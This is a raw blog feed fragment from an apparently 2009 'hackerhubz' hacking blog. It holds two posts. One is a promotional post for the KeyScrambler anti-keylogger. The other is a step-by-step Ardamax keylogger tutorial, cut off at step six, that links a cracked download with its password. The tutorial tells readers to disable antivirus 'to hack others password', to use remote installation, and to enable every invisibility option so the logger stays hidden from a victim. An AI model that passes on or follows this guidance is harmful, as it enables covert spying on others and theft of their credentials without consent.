&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;a href="http://www.ziddu.com/download/6788007/KeyScramblerHackerHubz.rar.html"&gt;Download For Free Now..&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: 16px;"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;It will protect users when using &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;online shopping, ma&lt;/span&gt;&lt;span style="font-size: 16px;"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;il , credit cards , bank accounts , house addresses , java , flash , browser dialogs , browser passwords and more.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/SspG351Hk8I/AAAAAAAAADg/WL8458zInUI/s1600-h/KSGoogle.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/SspG351Hk8I/AAAAAAAAADg/WL8458zInUI/s320/KSGoogle.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: x-large;"&gt;How It Works??&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="font-family: Arial; font-size: 16px;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;After you install KeyScrambler&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;Personal&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;, if say some keylogger&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;tool&lt;/span&gt;&amp;nbsp;is installed on your computer&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;and whatever you enter it will send as junk(false) data (encrypted format) to&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;keyloggers&lt;/span&gt;&amp;nbsp;and prevents your data. In simple, It encrypts your keystrokes at the keyboard driver level in the kernel, as they enter the computer. Once you install KeyScrambler computer&lt;/span&gt;&amp;nbsp;restart is necessary and it works background without making any changes to your browser. you can customize certain hotkey to enable or disable encryption.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_5rpSJrmeITE/SspHstPOBFI/AAAAAAAAADw/SKAwPLt3Vkk/s1600-h/keyscrambleroptions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_5rpSJrmeITE/SspHstPOBFI/AAAAAAAAADw/SKAwPLt3Vkk/s320/keyscrambleroptions.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="font-family: Arial; font-size: 16px;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;span style="font-weight: bold; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;Highlights of KeyScrambler&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;Personal&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;-&amp;nbsp;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;# It defeats old and new, known and unknown,&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;keyloggers&lt;/span&gt;&amp;nbsp;and even works on security compromised computers.&lt;/span&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;# It supports more than 100 applications and user friendly interface.&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;# It is compatible with other security programs , authentication methods and easy to use.&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;The&amp;nbsp;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;personal&lt;/span&gt;&amp;nbsp;version is free and only works with three browsers in Windows – IE, Firefox, and Flock.&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;&lt;a href="http://www.ziddu.com/download/6788007/KeyScramblerHackerHubz.rar.html"&gt;Download..&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;It is a must for all who don't want to be a victim of hacking attacks..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-family: Arial;"&gt;So be protected and njoy Safe Surfing.. n do comment..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-6427493746137135391?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/6427493746137135391/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/protect-yourself-from-keyloggers.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6427493746137135391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6427493746137135391'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/protect-yourself-from-keyloggers.html' title='Protect Yourself From Keyloggers..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_5rpSJrmeITE/SspG_P9Lo-I/AAAAAAAAADo/UEMcmHfeopw/s72-c/keyscrambler.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-3364399572297570195</id><published>2009-10-05T23:57:00.000+05:30</published><updated>2009-10-06T20:16:57.555+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='binders'/><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='Remote Hacking'/><title type='text'>Hacking Using Keylogger</title><content type='html'>&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So here comes one of the most important technique for hacking - keylogger&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;A keylogger intercepts all the keystrokes typed in the system( Including the Passwords!!!) and send it to you by mail. so you can not only get the password but also all his activities over the system..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;here i am giving tutorial about one of the most used keylogger: ArdaMax&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Basically&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;what is keylogger??&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;keylogger&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;is a hardware device&amp;nbsp;or a software program&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;that records the real time activity of a&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;user including the keyboard keys&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;they press&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;.&amp;nbsp;These keyloggers allow not only keyboard keystrokes to be captured but also are often capable of collecting screen capture&amp;nbsp;from the&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;. The keys they press are programmed to automatically transmit data over the network to a&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;remote&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;or&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Web server&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;.&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So before going forward download the software from &lt;span style="font-size: x-large;"&gt;&lt;a href="http://www.ziddu.com/download/6786792/ardamaxkeyloggerHackerhubz.rar.html"&gt;here..&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;it also includes the binder software.. will give information about it in coming posts..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;span style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif; line-height: 16px;"&gt;Password : &lt;b&gt;hackerhubz&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Your antivirus might detect it so turn it off when you unpack and work with it to hack others password..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;1. After installing the program, when u run it for the first time, you’d be asked to put in the name and the serial number&amp;nbsp;which u will get from the downloaded software folder.[i hav included the key for the software]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;2. After activating it,&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;lets&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;open it up. When you’ll open it, you’ll see an icon added into your system tray..&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_5rpSJrmeITE/Sso8MHisn-I/AAAAAAAAACw/2o7qrAknBOc/s1600-h/ardamax2-300x90.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_5rpSJrmeITE/Sso8MHisn-I/AAAAAAAAACw/2o7qrAknBOc/s320/ardamax2-300x90.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;3. &amp;nbsp;Now&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;lets&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;right click on that icon &amp;amp; then click on “Remote Installation”.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8Tqvn_FI/AAAAAAAAAC4/J5msqjSbL7Y/s1600-h/ardamax3-300x264.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8Tqvn_FI/AAAAAAAAAC4/J5msqjSbL7Y/s320/ardamax3-300x264.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;4.&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Lets&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;click on next . In the option that says “Additional components” select ONLY “Log viewer”.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8ho4XhkI/AAAAAAAAADA/KRRErX9gqkI/s1600-h/ardamax4-300x261.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8ho4XhkI/AAAAAAAAADA/KRRErX9gqkI/s320/ardamax4-300x261.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;5. &amp;nbsp;Now next screen would give you “Invisibility” options. This will help you to hide your key logger from your victim’s&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;. So CHECK’EM all!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8n5ra_OI/AAAAAAAAADI/uB9RpCR9Izo/s1600-h/ardamax5-300x261.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_5rpSJrmeITE/Sso8n5ra_OI/AAAAAAAAADI/uB9RpCR9Izo/s320/ardamax5-300x261.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="line-height: 16px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;6. Now next screen says “Security”, i personally don’t find it useful so you may just click on NEXT.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
